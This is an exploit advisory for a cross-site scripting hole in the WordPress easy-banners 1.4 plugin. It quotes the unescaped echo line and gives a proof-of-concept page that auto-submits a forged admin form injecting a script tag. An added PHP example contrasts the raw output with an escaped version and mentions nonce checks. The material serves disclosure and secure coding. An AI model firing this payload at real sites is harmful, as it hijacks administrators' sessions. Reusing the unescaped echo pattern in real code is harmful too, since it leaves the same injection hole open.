######################
# Exploit Title : WordPress easy-banners.1.4 Cross Site Scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : http://wordpress.org/plugins/easy-banners/

# Software Link : http://downloads.wordpress.org/plugin/easy-banners.1.4.zip

# Date : 2014-06-28

# Tested on : Windows 7 / Mozilla Firefox

######################

# Location : http://localhost/wp-admin/options-general.php?page=easy-banners.php

######################

# Vulnerable code :

<input type="hidden" name="name" id="name" value="<?php echo $row['name']; ?>" />


######################

Exploit Code:

<html>
<body>
<form name="form1" method="post" action="http://localhost/wp-admin/options-general.php?page=easy-banners.php">
<table class="widefat" style="width: 50%;">
  <input type="hidden" name="name" id="name" size="55" maxlength="250" value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('form1.submit()', 1);
</script>
</form>
</body>
</html>
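
Added example (not part of the original advisory and not the plugin's code): a stand-alone PHP script that renders the PoC value through the vulnerable echo pattern and through an attribute-escaped version, then parses both to show whether a script element results. The function names are hypothetical, and htmlspecialchars() stands in for WordPress's esc_attr() so the script runs without WordPress.

```php
<?php
// Added example, not the plugin's code. $row['name'] stands in for the stored
// banner name; the sample value is the payload string from the PoC above.

function render_vulnerable(array $row): string
{
    // Pattern from the advisory: value echoed raw into a double-quoted attribute.
    return '<input type="hidden" name="name" id="name" value="' . $row['name'] . '" />';
}

function render_hardened(array $row): string
{
    // Escape for the attribute context. ENT_QUOTES encodes both " and ',
    // so the value can no longer terminate the attribute.
    // Inside WordPress the equivalent call is esc_attr($row['name']).
    $safe = htmlspecialchars($row['name'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="name" id="name" value="' . $safe . '" />';
}

// Parse the rendered markup with an HTML parser and report what it contains.
function inspect_markup(string $html): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // tolerate fragment markup
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'script_elements' => $doc->getElementsByTagName('script')->length,
        'input_value'     => $input ? $input->getAttribute('value') : null,
    ];
}

$row = ['name' => '"/><script>alert(1);</script>'];  // constructed sample input

$renderings = ['vulnerable' => render_vulnerable($row), 'hardened' => render_hardened($row)];
foreach ($renderings as $label => $html) {
    $r = inspect_markup($html);
    printf("%-10s scripts=%d value=%s\n", $label, $r['script_elements'],
        var_export($r['input_value'], true));
}

// Note: the PoC is delivered as a cross-site auto-submitting form. Output
// escaping does not address that delivery path; in WordPress that is the job of
// wp_nonce_field() in the form and check_admin_referer() in the handler.
```

In the hardened rendering the parser sees no script element and the input's value attribute round-trips to the original string, so legitimate names containing quotes or angle brackets are preserved rather than stripped.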


#####################

Discovered By : ACC3SS

#####################